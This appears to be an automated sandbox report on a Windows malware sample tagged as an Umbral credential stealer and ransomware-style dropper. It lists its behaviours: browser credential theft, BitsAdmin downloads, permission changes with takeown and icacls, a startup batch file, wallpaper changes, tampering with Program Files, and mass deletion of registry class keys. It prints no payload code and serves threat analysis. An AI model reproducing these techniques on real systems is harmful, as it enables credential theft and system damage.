Malware Analysis Report

2024-10-16 05:03

Sample ID 240809-bar1rsxdkd
Target ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093
SHA256 ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093
Tags
discovery dropper exploit ransomware umbral credential_access execution stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093

Threat Level: Known bad

The file ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093 was found to be: Known bad.

Malicious Activity Summary

discovery dropper exploit ransomware umbral credential_access execution stealer

Umbral

Detect Umbral payload

Credentials from Password Stores: Credentials from Web Browsers

Download via BitsAdmin

Downloads MZ/PE file

Blocklisted process makes network request

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Possible privilege escalation attempt

Checks computer location settings

Modifies file permissions

Drops startup file

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Enumerates connected drives

Sets desktop wallpaper using registry

Drops file in Program Files directory

System Network Configuration Discovery: Internet Connection Discovery

System Location Discovery: System Language Discovery

Browser Information Discovery

Enumerates physical storage devices

Unsigned PE

Modifies registry class

Suspicious use of WriteProcessMemory

Detects videocard installed

Kills process with taskkill

Views/modifies file attributes

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Script User-Agent

Runs ping.exe

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-09 00:56

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-09 00:56

Reported

2024-08-09 00:59

Platform

win7-20240704-en

Max time kernel

82s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat C:\Windows\system32\cmd.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\R: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\D: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\WScript.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ADOBEU~1.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\JP2KLib.dll C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\REVIEW~4.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\RE99D5~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\REVIEW~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\atl.dll C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DEFAUL~1.PDF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Onix32.dll C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\SERVER~2.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ADD_RE~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\OPEN_O~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\IDENTI~1 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LOGTRA~1.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\vdk150.dll C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\STANDA~1.PDF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\FORMS_~3.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\TURNON~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\TURNOF~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\END_RE~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPU~1.INI C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSIG~1.PDF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\FORMS_~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\REVIEW~3.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AXSLE.dll C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\icudt36.dll C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MYRIAD~1.OTF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\RE78D9~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ADOBEL~1.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\icucnv36.dll C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\RE1558~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\SERVER~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\STOP_C~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\SUBMIS~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\CRYPTO~1.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\EMAIL_~2.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\FORMS_~2.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\DISTRI~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\EMAIL_~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\RECDE7~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\TURNOF~2.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\FORM_R~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\SERVER~3.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\server\classes.jsa C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LOGSES~1.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\CREATE~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ENDED_~1.GIF C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\CRYPTO~1.SIG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMPRO~1.CER C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\LICENS~1.HTM C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\DllHost.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\PropertySheetHandlers\{3EA48300-8CF6-101B-84FB-666CCB9BCD32} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.odt\OpenWithList\WordPad.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.aifc\PersistentHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.bkf\PersistentHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.inx C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.mdb C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.p7m\PersistentHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.qds C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.eprtx C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.pab C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.potx\ShellEx\{BB2E617C-0920-11d1-9A0B-00C04FC2D6C1} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.eprtx\PersistentHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.hxk\OpenWithProgids C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.lib\PersistentHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.mp1 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.api\AcroExch.Plugin\ShellNew C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.cue C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.mxf C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.pdf\OpenWithList C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.asf\PersistentHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.c2r\OpenWithList\ehshell.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.eprtx\OpenWithProgIds C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.eprtx\shellex\PropertyHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.hxd\OpenWithProgids\Shared C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.m3u8 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.mpg\OpenWithList C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.pot\ShellEx C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.pps\PowerPoint.SlideShow.8 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.doc\Word.Document.8\ShellNew C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.fnd C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.hol\OpenWithProgids C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.htw C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.jtx\PersistentHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.ppt\PowerPoint.Show.8 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.dtd\OpenWithProgids C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.M2T\OpenWithProgIds C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.etp\PersistentHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.pcb\PCBFile\ShellNew C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.snd\PersistentHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.imc\PersistentHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.sit\PersistentHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.doc C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.mk C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.pnf C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.cpp C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.hxf C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.inc\PersistentHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.ac3 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.m1v\ShellEx\{e357fccd-a995-4576-b01f-234630154e96} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.asf\ShellEx C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.avi\ShellEx C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.drv\PersistentHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.mag\Access.Shortcut.Diagram.1\ShellNew C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.otf C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.pwz C:\Windows\system32\reg.exe N/A
